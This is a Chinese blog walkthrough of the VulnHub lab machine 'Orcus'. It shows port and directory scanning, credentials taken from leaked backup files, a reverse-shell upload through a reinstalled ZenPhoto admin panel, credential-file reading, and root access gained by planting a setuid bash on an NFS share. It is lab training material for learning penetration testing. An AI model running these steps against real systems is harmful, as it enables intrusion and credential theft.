Orcus 靶机

信息收集

┌──(kali㉿kali)-[~/Downloads/Orcus]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.143
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-20 02:30 EDT
Nmap scan report for 192.168.56.143
Host is up (0.00058s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
110/tcp   open  pop3
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
143/tcp   open  imap
443/tcp   open  https
445/tcp   open  microsoft-ds
993/tcp   open  imaps
995/tcp   open  pop3s
2049/tcp  open  nfs
34305/tcp open  unknown
38125/tcp open  unknown
44363/tcp open  unknown
45529/tcp open  unknown
MAC Address: 08:00:27:EB:CE:6D (Oracle VirtualBox virtual NIC)

开放的端口有点多，五位数的端口先不看了，22,53,80,110,111,139,143,443,445,993,995,2049

┌──(kali㉿kali)-[~/Downloads/Orcus]
└─$ sudo nmap -sT -sV -sC -O -p22,53,80,110,111,139,143,443,445,993,995,2049 192.168.56.143
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-20 02:32 EDT
Nmap scan report for 192.168.56.143
Host is up (0.00053s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|   256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
|_  256 c9:a9:c9:0d:df:7c:fc:a7:da:87:ef:d3:38:c3:f2:a6 (ED25519)
53/tcp   open  domain      ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn\'t have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 30 disallowed entries (15 shown)
| /exponent.js.php /exponent.js2.php /exponent.php 
| /exponent_bootstrap.php /exponent_constants.php /exponent_php_setup.php 
| /exponent_version.php /getswversion.php /login.php /overrides.php 
| /popup.php /selector.php /site_rss.php /source_selector.php 
|_/thumb.php
110/tcp  open  pop3        Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_pop3-capabilities: UIDL STLS CAPA TOP SASL PIPELINING RESP-CODES AUTH-RESP-CODE
|_ssl-date: TLS randomness does not represent time
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      39021/udp6  mountd
|   100005  1,2,3      44363/tcp   mountd
|   100005  1,2,3      48748/tcp6  mountd
|   100005  1,2,3      57241/udp   mountd
|   100021  1,3,4      41210/tcp6  nlockmgr
|   100021  1,3,4      45529/tcp   nlockmgr
|   100021  1,3,4      47338/udp   nlockmgr
|   100021  1,3,4      48376/udp6  nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open  imap        Dovecot imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_imap-capabilities: LOGINDISABLEDA0001 IDLE more LOGIN-REFERRALS post-login IMAP4rev1 STARTTLS Pre-login SASL-IR listed ENABLE LITERAL+ capabilities OK ID have
443/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|   256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
|_  256 c9:a9:c9:0d:df:7c:fc:a7:da:87:ef:d3:38:c3:f2:a6 (ED25519)
445/tcp  open  `▒��      Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp  open  ssl/imap    Dovecot imapd
|_imap-capabilities: more IDLE ID AUTH=PLAINA0001 IMAP4rev1 LOGIN-REFERRALS Pre-login SASL-IR post-login ENABLE LITERAL+ listed capabilities OK have
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
995/tcp  open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: UIDL USER CAPA TOP SASL(PLAIN) PIPELINING RESP-CODES AUTH-RESP-CODE
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
2049/tcp open  nfs         2-4 (RPC #100003)
MAC Address: 08:00:27:EB:CE:6D (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: ORCUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2023-09-20T14:32:50
|_  start_date: N/A
|_nbstat: NetBIOS name: ORCUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: \x00
|   NetBIOS computer name: ORCUS\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-09-20T10:32:50-04:00
|_clock-skew: mean: 9h19m58s, deviation: 2h18m34s, median: 7h59m57s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

ubuntu 操作系统，443 也是 ssh 端口，网站目录下包含 robots.txt

目录爆破

尝试对 robots.txt 中的各个目录进行查看，同时使用目录爆破

┌──(kali㉿kali)-[/tmp/tmp]
└─$ sudo gobuster dir -u http://192.168.56.143/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x php,html,sql,rar,zip,txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.143/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              txt,php,html,sql,rar,zip
[+] Timeout:                 10s
===============================================================
2023/09/20 05:38:01 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 101]
/.php                 (Status: 403) [Size: 293]
/.html                (Status: 403) [Size: 294]
/files                (Status: 301) [Size: 316] [--> http://192.168.56.143/files/]
/themes               (Status: 301) [Size: 317] [--> http://192.168.56.143/themes/]
/login.php            (Status: 302) [Size: 0] [--> http://192.168.56.143/index.php?controller=login&action=showlogin]                                                                                                                   
/admin                (Status: 301) [Size: 316] [--> http://192.168.56.143/admin/]
/index.php            (Status: 200) [Size: 4567]
/test.php             (Status: 200) [Size: 0]
/install              (Status: 301) [Size: 318] [--> http://192.168.56.143/install/]
/thumb.php            (Status: 302) [Size: 0] [--> /framework/core/assets/images/default_preview_notfound.gif]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.143/javascript/]
/external             (Status: 301) [Size: 319] [--> http://192.168.56.143/external/]
/notes.php            (Status: 200) [Size: 0]
/connect.php          (Status: 200) [Size: 0]
/robots.txt           (Status: 200) [Size: 1347]
/cron                 (Status: 301) [Size: 315] [--> http://192.168.56.143/cron/]
/tmp                  (Status: 301) [Size: 314] [--> http://192.168.56.143/tmp/]
/LICENSE              (Status: 200) [Size: 15437]
/framework            (Status: 301) [Size: 320] [--> http://192.168.56.143/framework/]
/phpmyadmin           (Status: 301) [Size: 321] [--> http://192.168.56.143/phpmyadmin/]
/reset.php            (Status: 302) [Size: 0] [--> http://192.168.56.143/index.php?section=SITE_DEFAULT_SECTION]
/backups              (Status: 301) [Size: 318] [--> http://192.168.56.143/backups/]
/webalizer            (Status: 200) [Size: 0]
/xmlrpc.php           (Status: 200) [Size: 0]
/selector.php         (Status: 200) [Size: 0]
/FCKeditor            (Status: 301) [Size: 320] [--> http://192.168.56.143/FCKeditor/]
/.php                 (Status: 403) [Size: 293]
/.html                (Status: 403) [Size: 294]
/server-status        (Status: 403) [Size: 302]
/overrides.php        (Status: 200) [Size: 0]
/logitech-quickcam_W0QQcatrefZC5QQfbdZ1QQfclZ3QQfposZ95112QQfromZR14QQfrppZ50QQfsclZ1QQfsooZ1QQfsopZ1QQfssZ0QQfstypeZ1QQftrtZ1QQftrvZ1QQftsZ2QQnojsprZyQQpfidZ0QQsaatcZ1QQsacatZQ2d1QQsacqyopZgeQQsacurZ0QQsadisZ200QQsaslopZ1QQsofocusZbsQQsorefinesearchZ1.html (Status: 403) [Size: 545]
/site_rss.php         (Status: 302) [Size: 0] [--> http://192.168.56.143/index.php?controller=rss&action=feed]
Progress: 8914966 / 8916838 (99.98%)
===============================================================
2023/09/20 06:06:39 Finished
===============================================================

admin 目录的源码中有这样一句注释 This is a backup taken from the backups/，访问 backups 发现了两个文件，ssh-creds.bak 权限限制了读取

备份文件泄露

压缩文件解压后在本地进行查看

┌──(kali㉿kali)-[~/Downloads/Orcus/SimplePHPQuiz]
└─$ tree        
.
├── add_quiz.php
├── css
│   ├── bootstrap.css
│   ├── bootstrap.css.map
│   ├── bootstrap.min.css
│   ├── bootstrap-theme.css
│   ├── bootstrap-theme.css.map
│   ├── bootstrap-theme.min.css
│   └── theme.css
├── fonts
│   ├── glyphicons-halflings-regular.eot
│   ├── glyphicons-halflings-regular.svg
│   ├── glyphicons-halflings-regular.ttf
│   └── glyphicons-halflings-regular.woff
├── includes
│   ├── db_conn.php
│   ├── footer.html
│   ├── functions_list.php
│   ├── header.html
│   ├── validation_functions.php
│   └── view_result.php
├── index.php
├── js
│   ├── bootstrap.js
│   └── bootstrap.min.js
├── process_quizAdd.php
├── quiz.php
├── README.md
├── samplequiz.php
└── view_result.php

5 directories, 26 files

在 include 文件夹中的 db_conn.php 发现了数据库用户名和密码

┌──(kali㉿kali)-[~/Downloads/Orcus/SimplePHPQuiz]
└─$ cat includes/db_conn.php 
<?php 

//Set the database access information as constants
DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');

@ $dbc = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);

if (mysqli_connect_error()){
        echo "Could not connect to MySql. Please try again";
        exit();
}
?>

目录爆破的结果中有 phpmyadmin，尝试使用上述口令登录

但是翻了一遍，就只找到了一个邮箱，和两个密码哈希，但是在线网站中没有结果。考虑在此处 getshell，但是被限制了可写入的文件夹。

在这里卡了许久。尝试了对各个目录再次进行查看

1
2
3

http://192.168.56.143/index.php?controller=login&action=showlogin
This site is currently down for maintenance.
Database is currently Off-line!

各种 md 文件是此 cms 的相关文件，尝试搜索此 cms 的漏洞，找到的是 sql 注入漏洞，但是数据库没连接上，这个漏洞意义不大，本地包含漏洞利用失败，可能是版本不对

1 2	`/TODO.md Exponent Content Management System`

还有一些包含文件或文件夹的目录，其中也没有敏感信息

SMB 和 NFS 查看

尝试对 smb 和 nfs 进行测试

┌──(kali㉿kali)-[~/Downloads/Orcus]
└─$ sudo smbmap -H 192.168.56.143                     
[sudo] password for kali: 
[+] Guest session       IP: 192.168.56.143:445  Name: 192.168.56.143                                    
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        IPC$                                                    NO ACCESS       IPC Service (Orcus server (Samba, Ubuntu))
                                                                                                                    
┌──(kali㉿kali)-[~/Downloads/Orcus]
└─$ sudo nmap --script=smb-enum-shares.nse,smb-enum-users.nse 192.168.56.143
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-20 02:44 EDT
Nmap scan report for 192.168.56.143
Host is up (0.00087s latency).
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
110/tcp  open  pop3
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
993/tcp  open  imaps
995/tcp  open  pop3s
2049/tcp open  nfs
MAC Address: 08:00:27:EB:CE:6D (Oracle VirtualBox virtual NIC)

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\192.168.56.143\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (Orcus server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\192.168.56.143\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
| smb-enum-users: 
|   ORCUS\root (RID: 1001)
|     Full name:   root
|     Description: 
|     Flags:       Normal user account
|   ORCUS\viper (RID: 1000)
|     Full name:   viper
|     Description: 
|_    Flags:       Normal user account

Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds
                                                                                                                    
┌──(kali㉿kali)-[~/Downloads/Orcus]
└─$ showmount -e 192.168.56.143                                              
Export list for 192.168.56.143:
/tmp *

得到了一个可能的用户名 viper ，挂载点是 tmp 目录，似乎意义不大（

尝试了一下用数据库密码来 ssh 爆破一下，失败。

束手无策.jpg，看 WP，字典问题我是没考虑到的，上次也是在目录爆破卡住，难绷

┌──(kali㉿kali)-[/tmp/tmp]
└─$ sudo gobuster dir -u http://192.168.56.143/ -w /usr/share/seclists/Discovery/Web-Content/big.txt 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.143/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/09/20 06:18:48 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 298]
/.htpasswd            (Status: 403) [Size: 298]
/FCKeditor            (Status: 301) [Size: 320] [--> http://192.168.56.143/FCKeditor/]
/LICENSE              (Status: 200) [Size: 15437]
/admin                (Status: 301) [Size: 316] [--> http://192.168.56.143/admin/]
/backups              (Status: 301) [Size: 318] [--> http://192.168.56.143/backups/]
/cron                 (Status: 301) [Size: 315] [--> http://192.168.56.143/cron/]
/external             (Status: 301) [Size: 319] [--> http://192.168.56.143/external/]
/files                (Status: 301) [Size: 316] [--> http://192.168.56.143/files/]
/framework            (Status: 301) [Size: 320] [--> http://192.168.56.143/framework/]
/install              (Status: 301) [Size: 318] [--> http://192.168.56.143/install/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.143/javascript/]
/phpmyadmin           (Status: 301) [Size: 321] [--> http://192.168.56.143/phpmyadmin/]
/robots.txt           (Status: 200) [Size: 1347]
/server-status        (Status: 403) [Size: 302]
/sitemap.xml          (Status: 200) [Size: 113]
/themes               (Status: 301) [Size: 317] [--> http://192.168.56.143/themes/]
/tmp                  (Status: 301) [Size: 314] [--> http://192.168.56.143/tmp/]
/webalizer            (Status: 200) [Size: 0]
/zenphoto             (Status: 301) [Size: 319] [--> http://192.168.56.143/zenphoto/]

===============================================================
2023/09/20 06:18:51 Finished
===============================================================

ZENphoto 安装

/zenphoto 目录进入后，是安装界面，提示 MySQL 连接有问题，正好我们有用户名和密码

填入后点击 save

点击 apply

点击 go

安装成功，接下来提示需要设置 admin 用户和密码

设置 admin:admin123 为口令，点击 apply

接下来自动跳转到登录界面，使用我们设定好的密码来登录

后台 getshell

原本想去网上搜一搜 zenphoto 后台如何 getshell，但是资料太少了，自己一点点探索吧，先大致把功能看一遍，感觉是个管理照片的 cms

在上传页面中可以看到，zip 也需要解压后是图片格式，简单尝试了一下，可能是白名单，没法直接上传 php 文件

插件页面里看到一个可能有帮助的插件，描述中说明了它可以对上传文件进行简单管理

激活后，上传界面多了个选项

新建个文件，然后把反弹 shell 的代码放进去

提前开启监听，访问路径 http://192.168.56.143/zenphoto/zp-data/test.php 来反弹 shell

提权

┌──(kali㉿kali)-[~/Downloads/Orcus]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.143] 45566
Linux Orcus 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:05 UTC 2016 i686 athlon i686 GNU/Linux
 06:48:46 up 6 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (1560): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Orcus:/$ sudo -l
sudo -l
sudo: unable to resolve host Orcus: Connection timed out
sudo: no tty present and no askpass program specified
www-data@Orcus:/$ which python
which python
/usr/bin/python
www-data@Orcus:/$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
www-data@Orcus:/$ sudo -l
sudo -l
sudo: unable to resolve host Orcus: Connection timed out
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: 

sudo: 3 incorrect password attempts
www-data@Orcus:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    link/ether 08:00:27:eb:ce:6d brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.143/24 brd 192.168.56.255 scope global eth0
       valid_lft forever preferred_lft forever

信息收集

看看网站目录

www-data@Orcus:/var/www$ ls
ls
9bd556e5c961356857d6d527a7973560-zen-cart-v1.5.4-12302014.zip
a0c4f0d176f87ceda9b9890af09ed644-Adem-master.zip
b873fef091715964d207daa19d320a99-zenphoto-zenphoto-1.4.10.tar.gz
flag.txt
html
zenphoto-zenphoto-1.4.10
www-data@Orcus:/var/www$ cat flag.txt
cat flag.txt
868c889965b7ada547fae81f922e45c4
www-data@Orcus:/var/www$ cd html
cd html
www-data@Orcus:/var/www/html$ ls -alih
ls -alih
ls: cannot open directory '.': Permission denied
www-data@Orcus:/var/www/html$ ls 
ls
ls: cannot open directory '.': Permission denied
www-data@Orcus:/var/www/html$ cd zenphoto
cd zenphoto
www-data@Orcus:/var/www/html/zenphoto$ ls
ls
LICENSE    albums  cache_html       favicon.ico  plugins     themes    zp-core
README.md  cache   contributing.md  index.php    robots.txt  uploaded  zp-data

发现了一个 flag.txt，但是html 目录的文件夹没有 x 权限我们无法获取到目录信息，去看看定时任务、用户家目录

www-data@Orcus:/var$ ls -alih /etc/passwd /etc/shadow /etc/crontab
ls -alih /etc/passwd /etc/shadow /etc/crontab
262378 -rw-r--r-- 1 root root    722 Feb  9  2013 /etc/crontab
265272 -rw-r--r-- 1 root root   2.2K Oct 28  2016 /etc/passwd
263179 -rw-r----- 1 root shadow 1.2K Oct 28  2016 /etc/shadow
www-data@Orcus:/var$ cat /etc/passwd | grep "/bin/bash"
cat /etc/passwd | grep "/bin/bash"
root:x:0:0:root:/root:/bin/bash
postgres:x:110:120:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
kippo:x:1001:27::/home/kippo:/bin/bash

www-data@Orcus:/var/backups$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
www-data@Orcus:/var/www/html/zenphoto$ cd /home
cd /home
www-data@Orcus:/home$ ls
ls
www-data@Orcus:/home$ ls -alih
ls -alih
total 12K
  12 drwxr-xr-x  3 root root 4.0K Nov  1  2016 .
   2 drwxr-xr-x 24 root root 4.0K Oct 30  2016 ..
8939 drwxr-xr-x  2 root root 4.0K Nov  1  2016 .youwillfindnothinghere
www-data@Orcus:/home$ cd .youwillfindnothinghere
cd .youwillfindnothinghere
www-data@Orcus:/home/.youwillfindnothinghere$ ls -liah
ls -liah
total 8.0K
8939 drwxr-xr-x 2 root root 4.0K Nov  1  2016 .
  12 drwxr-xr-x 3 root root 4.0K Nov  1  2016 ..
8940 -rw-r--r-- 1 root root    0 Nov  1  2016 itoldyou

用户家目录空空如也，SUID 呢

www-data@Orcus:/var/www$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
    46465    388 -rwsr-xr--   1 root     dip        396068 Jan 29  2016 /usr/sbin/pppd
    26094     40 -rwsr-xr-x   1 root     root        39560 Mar 29  2016 /usr/bin/chsh
    20009     20 -rwsr-xr-x   1 root     root        18216 Jan 17  2016 /usr/bin/pkexec
    18795     36 -rwsr-xr-x   1 root     root        36288 Mar 29  2016 /usr/bin/newuidmap
    18793     36 -rwsr-xr-x   1 root     root        36288 Mar 29  2016 /usr/bin/newgidmap
    26095     48 -rwsr-xr-x   1 root     root        48264 Mar 29  2016 /usr/bin/chfn
    26091     52 -rwsr-xr-x   1 root     root        53128 Mar 29  2016 /usr/bin/passwd
    19523     52 -rwsr-sr-x   1 daemon   daemon      50748 Jan 14  2016 /usr/bin/at
    26097     80 -rwsr-xr-x   1 root     root        78012 Mar 29  2016 /usr/bin/gpasswd
     1518     36 -rwsr-xr-x   1 root     root        34680 Mar 29  2016 /usr/bin/newgrp
     4130    160 -rwsr-xr-x   1 root     root       159852 Aug 17  2016 /usr/bin/sudo
    18105     96 -rwsr-sr-x   1 root     mail        96192 May 15  2015 /usr/bin/procmail
   279472     12 -rwsr-xr-x   1 root     root         9760 Jul 26  2015 /usr/lib/authbind/helper
      536      8 -rwsr-xr-x   1 root     root         5480 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
    19356    504 -rwsr-xr-x   1 root     root       513528 Aug 11  2016 /usr/lib/openssh/ssh-keysign
   131672     48 -rwsr-xr--   1 root     messagebus    46436 Apr  1  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   135108     16 -rwsr-xr-x   1 root     root          13960 Jan 17  2016 /usr/lib/policykit-1/polkit-agent-helper-1
    18834     52 -rwsr-xr-x   1 root     root          50540 Oct  6  2016 /usr/lib/snapd/snap-confine
    18771     40 -rwsr-xr-x   1 root     root          38300 Oct 21  2016 /usr/lib/i386-linux-gnu/lxc/lxc-user-nic
    26896     96 -rwsr-xr-x   1 root     root          96644 Apr  6  2016 /sbin/mount.nfs
    19990     40 -rwsr-xr-x   1 root     root          38660 Aug 21  2015 /sbin/mount.cifs
   132439     40 -rwsr-xr-x   1 root     root          38932 May  7  2014 /bin/ping
   131099     40 -rwsr-xr-x   1 root     root          38900 Mar 29  2016 /bin/su
   134208    156 -rwsr-xr-x   1 root     root         157424 Feb 17  2016 /bin/ntfs-3g
   131157     32 -rwsr-xr-x   1 root     root          30112 Jul 12  2016 /bin/fusermount
   133438     28 -rwsr-xr-x   1 root     root          26492 May 26  2016 /bin/umount
   133434     36 -rwsr-xr-x   1 root     root          34812 May 26  2016 /bin/mount
   131637     44 -rwsr-xr-x   1 root     root          43316 May  7  2014 /bin/ping6

有几个不熟悉的查了一 d下（直接问 chatgpt），/usr/lib/snapd/snap-confine SUID 倒是存在提权 exp，但是由于某些文件夹的权限问题利用失败

内核提权

尝试内核提权

还参考了 linpeas 的结果，图片中和 4.4.0 相关的 exp 都失败了。linpeas 中高可能性的 exp 也都失败。这里再次陷入迷茫。从头开始看 linpeas 吧。

linpeas 不知道在哪个 php 的配置文件中找到了又一个数据库用户名和密码

1 2	`$dbpass='sX6yATfXjVyf'; $dbuser='phpmyadmin';`

还发现了一个特殊的文件

1	`/etc/kippo/honeyfs/etc/passwd`

进入到 /etc/kippo

竟然是个蜜罐

ww-data@Orcus:/etc/kippo$ ls
ls
README.md  dl   fs.pickle  kippo      kippo.tac  start.sh  txtcmds
data       doc  honeyfs    kippo.cfg  log        stop.sh   utils
www-data@Orcus:/etc/kippo$ cd data
cd data
www-data@Orcus:/etc/kippo/data$ ls
ls
userdb.txt
www-data@Orcus:/etc/kippo/data$ cat userdb.txt
cat userdb.txt
root:0:123456
fakuser:1:TH!SP4SSW0RDIS4Fl4G!

发现了蜜罐的用户名和密码，这竟然还是个 flag，尝试用这里的密码和之前收集到的数据库用户名的密码，尝试切换 root，但是失败了。

NFS 提权

检查 linpeas 的结果时忽略了一条高危，看了 WP 才想起来

问一下 chatgpt

红队笔记的提权精讲里也提到了这种提权方法 NFS 提权 [[../technique/Privilege Escalation/「红队笔记」Linux提权精讲|「红队笔记」Linux提权精讲]]

在 shell 中把 bash 文件直接复制到 tmp 文件夹，然后在挂载后的本地 bash 中修改文件属主和权限

www-data@Orcus:/tmp$ cp /bin/bash ./
cp /bin/bash ./
www-data@Orcus:/tmp$ ls -alih ./bash                            
ls -alih ./bash                                                 
8247 -rwxr-xr-x 1 www-data www-data 1.1M Sep 21 13:17 ./bash

┌──(root㉿kali)-[/tmp/tmp]
└─# chown root:root bash 

┌──(root㉿kali)-[/tmp/tmp]
└─# chmod +s bash

www-data@Orcus:/tmp$ ls -alih ./bash
ls -alih ./bash 
8247 -rwsr-sr-x 1 root root 1.1M Sep 21 13:17 ./bash
www-data@Orcus:/tmp$ ./bash -p
./bash -p
bash-4.3# whoami
whoami
root
bash-4.3# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
bash-4.3# cd /root
cd /root
bash-4.3# ls
ls
flag.txt
bash-4.3# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    link/ether 08:00:27:eb:ce:6d brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.143/24 brd 192.168.56.255 scope global eth0
       valid_lft forever preferred_lft forever
bash-4.3# uname -a
uname -a
Linux Orcus 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:05 UTC 2016 i686 athlon i686 GNU/Linux
bash-4.3# cd /root
cd /root
bash-4.3# ls -liah
ls -liah
total 44K
    16 drwx------  6 root root 4.0K Mar 11  2017 .
     2 drwxr-xr-x 24 root root 4.0K Oct 30  2016 ..
    20 -rw-------  1 root root  118 Mar 11  2017 .bash_history
    17 -rw-r--r--  1 root root 3.1K Feb 19  2014 .bashrc
131267 drwx------  3 root root 4.0K Nov  1  2016 .cache
262316 drwx------  3 root root 4.0K Oct 11  2016 .config
134577 drwxr-xr-x  2 root root 4.0K Oct 28  2016 .nano
    18 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
131271 drwx------  2 root root 4.0K Oct 22  2016 .ssh
  8248 -rw-------  1 root root  657 Nov  1  2016 .viminfo
   863 ----------  1 root root   33 Oct 22  2016 flag.txt
bash-4.3# cat flag.txt
cat flag.txt
807307b49314f822985d0410de7d8bfe

knowledge_database > vulnhub

Orcus 靶机

https://i3eg1nner.github.io/2023/09/f93f3657d204.html

作者

I3eg1nner

发布于

2023年9月20日

许可协议

Sedna 靶机上一篇

Moria 1.1 靶机下一篇